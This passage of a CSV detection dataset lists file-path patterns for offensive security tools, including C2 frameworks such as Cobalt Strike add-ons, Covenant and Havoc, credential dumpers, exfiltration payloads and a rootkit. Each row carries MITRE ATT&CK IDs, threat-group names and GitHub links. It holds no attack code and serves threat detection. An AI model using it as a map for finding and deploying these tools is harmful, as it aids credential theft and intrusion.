T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" +"*/core/browser_linux.go*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" +"*/core/browser_windows.go*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" +"*/couchdb-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/couchdb-stats.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Covenant*.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Covenant.git*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Covenant/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/CovenantUsers/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Cracked5pider/*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" +"*/Cracked5pider/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/cracklord.git*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential 
Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" +"*/cracklord/cmd/*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" +"*/CrackMapExec.git","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/crackmapexec/cme.conf*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/cradle.ps1*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","1","N/A","N/A","N/A","N/A" +"*/Crassus.git*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" +"*/Crassus-main*","offensive_tool_keyword","Crassus","Crassus Windows privilege 
escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" +"*/crawler.py -u http*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","0","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" +"*/createforestcache.py*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*/createstager.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/cred_dump.rc*","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8269","2217","2023-06-11T19:16:05Z","2016-07-24T10:30:19Z" +"*/Cred_Dump.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*/credBandit/*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" +"*/creddump7*.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*/creddump7/*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/creddump7/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/Credentials/*.ccache*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/Credentials/firefox_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/Credentials/msol_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
+"*/credentials/SudoSnatch*","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/credentials/wifigrabber*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/CredEnum.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/CredEnum.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/CredEnum.h*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/creditcards.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/CredPhisher/*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/CredPrompt.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/CredPrompt/credprompt.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/creds-*/creds.zip*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - 
TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" +"*/creds-summary.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/crlfinjection.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/Cronos-Rootkit*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" +"*/CrossC2.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*/CrossC2/*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
